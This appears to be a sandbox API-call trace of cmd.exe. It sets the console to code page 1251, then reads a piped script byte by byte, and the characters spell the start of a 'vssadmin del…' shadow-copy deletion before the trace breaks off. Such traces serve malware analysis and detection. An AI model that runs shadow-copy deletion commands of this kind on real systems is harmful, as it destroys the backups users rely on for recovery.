	[0136.990] SetErrorMode (uMode=0x1) returned 0x0
	[0136.990] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x20b320, lpFilePart=0x15ee60 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x15ee60*="system32") returned 0x13
	[0136.990] SetErrorMode (uMode=0x0) returned 0x1
	[0136.990] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20b310, Size=0x42) returned 0x20b310
	[0136.990] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20b310) returned 0x42
	[0136.990] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0136.990] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0136.990] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x104) returned 0x205bb0
	[0136.990] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1f8) returned 0x209c60
	[0136.996] GetProcessHeap () returned 0x1f0000
	[0136.996] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209c60, Size=0x106) returned 0x209c60
	[0136.996] GetProcessHeap () returned 0x1f0000
	[0136.996] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209c60) returned 0x106
	[0136.996] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0136.996] GetProcessHeap () returned 0x1f0000
	[0136.996] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe8) returned 0x209d80
	[0136.996] GetProcessHeap () returned 0x1f0000
	[0136.996] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209d80, Size=0x7e) returned 0x209d80
	[0136.996] GetProcessHeap () returned 0x1f0000
	[0136.996] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209d80) returned 0x7e
	[0136.998] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0136.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x15ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x15ebd0) returned 0x205cc0
	[0136.999] GetProcessHeap () returned 0x1f0000
	[0136.999] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x28) returned 0x204660
	[0136.999] FindClose (in: hFindFile=0x205cc0 | out: hFindFile=0x205cc0) returned 1
	[0136.999] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x15ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x15ebd0) returned 0x205cc0
	[0136.999] GetProcessHeap () returned 0x1f0000
	[0136.999] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x204660, Size=0x8) returned 0x209950
	[0136.999] FindClose (in: hFindFile=0x205cc0 | out: hFindFile=0x205cc0) returned 1
	[0136.999] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
	[0136.999] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
	[0136.999] GetConsoleTitleW (in: lpConsoleTitle=0x15f120, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0136.999] GetProcessHeap () returned 0x1f0000
	[0136.999] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x21c) returned 0x20b370
	[0136.999] GetConsoleTitleW (in: lpConsoleTitle=0x20b380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0136.999] GetProcessHeap () returned 0x1f0000
	[0136.999] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20b370, Size=0x8a) returned 0x20b370
	[0136.999] GetProcessHeap () returned 0x1f0000
	[0136.999] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20b370) returned 0x8a
	[0136.999] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - mode  con cp select=1251") returned 1
	[0137.000] GetProcessHeap () returned 0x1f0000
	[0137.000] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b370 | out: hHeap=0x1f0000) returned 1
	[0137.000] InitializeProcThreadAttributeList (in: lpAttributeList=0x15eed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x15ee98 | out: lpAttributeList=0x15eed8, lpSize=0x15ee98) returned 1
	[0137.000] UpdateProcThreadAttribute (in: lpAttributeList=0x15eed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x15ee88, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x15eed8, lpPreviousValue=0x0) returned 1
	[0137.000] GetStartupInfoW (in: lpStartupInfo=0x15eff0 | out: lpStartupInfo=0x15eff0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8)) 
	[0137.000] GetProcessHeap () returned 0x1f0000
	[0137.000] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x20) returned 0x204660
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0137.001] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0137.001] GetProcessHeap () returned 0x1f0000
	[0137.001] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204660 | out: hHeap=0x1f0000) returned 1
	[0137.001] GetProcessHeap () returned 0x1f0000
	[0137.001] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x12) returned 0x208940
	[0137.001] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode  con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x15ef10*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode  con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x15eec0 | out: lpCommandLine="mode  con cp select=1251", lpProcessInformation=0x15eec0*(hProcess=0x54, hThread=0x50, dwProcessId=0x75c, dwThreadId=0x760)) returned 1
	[0137.011] CloseHandle (hObject=0x50) returned 1
	[0137.012] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0137.012] GetProcessHeap () returned 0x1f0000
	[0137.012] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x208aa0 | out: hHeap=0x1f0000) returned 1
	[0137.012] GetEnvironmentStringsW () returned 0x208aa0*
	[0137.012] GetProcessHeap () returned 0x1f0000
	[0137.012] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xafc) returned 0x20b370
	[0137.012] FreeEnvironmentStringsW (penv=0x208aa0) returned 1
	[0137.012] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x773b0000
	[0137.012] GetProcAddress (hModule=0x773b0000, lpProcName="NtQueryInformationProcess") returned 0x774014a0
	[0137.012] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x15e7c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x15e7c8, ReturnLength=0x0) returned 0x0
	[0137.012] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdb000, lpBuffer=0x15e800, nSize=0x380, lpNumberOfBytesRead=0x15e7c0 | out: lpBuffer=0x15e800*, lpNumberOfBytesRead=0x15e7c0*=0x380) returned 1
	[0137.012] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0137.569] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x15ee08 | out: lpExitCode=0x15ee08*=0x0) returned 1
	[0137.569] CloseHandle (hObject=0x54) returned 1
	[0137.569] _vsnwprintf (in: _Buffer=0x15f078, _BufferCount=0x13, _Format="%08X", _ArgList=0x15ee18 | out: _Buffer="00000000") returned 8
	[0137.569] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0137.569] GetProcessHeap () returned 0x1f0000
	[0137.569] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b370 | out: hHeap=0x1f0000) returned 1
	[0137.569] GetEnvironmentStringsW () returned 0x20e9b0*
	[0137.569] GetProcessHeap () returned 0x1f0000
	[0137.569] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb22) returned 0x20f4e0
	[0137.569] FreeEnvironmentStringsW (penv=0x20e9b0) returned 1
	[0137.569] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0137.569] GetProcessHeap () returned 0x1f0000
	[0137.569] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20f4e0 | out: hHeap=0x1f0000) returned 1
	[0137.569] GetEnvironmentStringsW () returned 0x20e9b0*
	[0137.569] GetProcessHeap () returned 0x1f0000
	[0137.569] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb22) returned 0x20f4e0
	[0137.569] FreeEnvironmentStringsW (penv=0x20e9b0) returned 1
	[0137.569] GetProcessHeap () returned 0x1f0000
	[0137.569] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x208940 | out: hHeap=0x1f0000) returned 1
	[0137.569] DeleteProcThreadAttributeList (in: lpAttributeList=0x15eed8 | out: lpAttributeList=0x15eed8) 
	[0137.569] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1
	[0137.570] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.570] SetConsoleMode (hConsoleHandle=0xf8, dwMode=0x0) returned 0
	[0137.570] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.570] GetConsoleMode (in: hConsoleHandle=0xf8, lpMode=0x4a43e194 | out: lpMode=0x4a43e194) returned 0
	[0137.570] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.570] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a43e198 | out: lpMode=0x4a43e198) returned 0
	[0137.570] GetConsoleOutputCP () returned 0x4e3
	[0137.570] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0137.571] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209d80 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209c60 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x205bb0 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b310 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209900 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20aae0 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x206550 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204630 | out: hHeap=0x1f0000) returned 1
	[0137.572] GetProcessHeap () returned 0x1f0000
	[0137.572] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209840 | out: hHeap=0x1f0000) returned 1
	[0137.572] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x15f338 | out: _Buffer="\r\n") returned 2
	[0137.572] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.572] GetFileType (hFile=0xf8) returned 0x3
	[0137.572] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.572] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0137.572] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f308, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f308*=0x2, lpOverlapped=0x0) returned 1
	[0137.572] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
	[0137.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a44c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0137.572] _vsnwprintf (in: _Buffer=0x4a43eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x15f348 | out: _Buffer="C:\\Windows\\system32") returned 19
	[0137.573] _vsnwprintf (in: _Buffer=0x4a43eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x15f348 | out: _Buffer=">") returned 1
	[0137.573] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.573] GetFileType (hFile=0xf8) returned 0x3
	[0137.573] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.573] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21
	[0137.573] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x15f338, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f338*=0x14, lpOverlapped=0x0) returned 1
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] GetFileType (hFile=0xec) returned 0x3
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.573] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.573] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.573] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.573] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.573] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.573] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.573] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.573] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1
	[0137.573] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.573] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.574] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.574] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1
	[0137.574] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.574] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
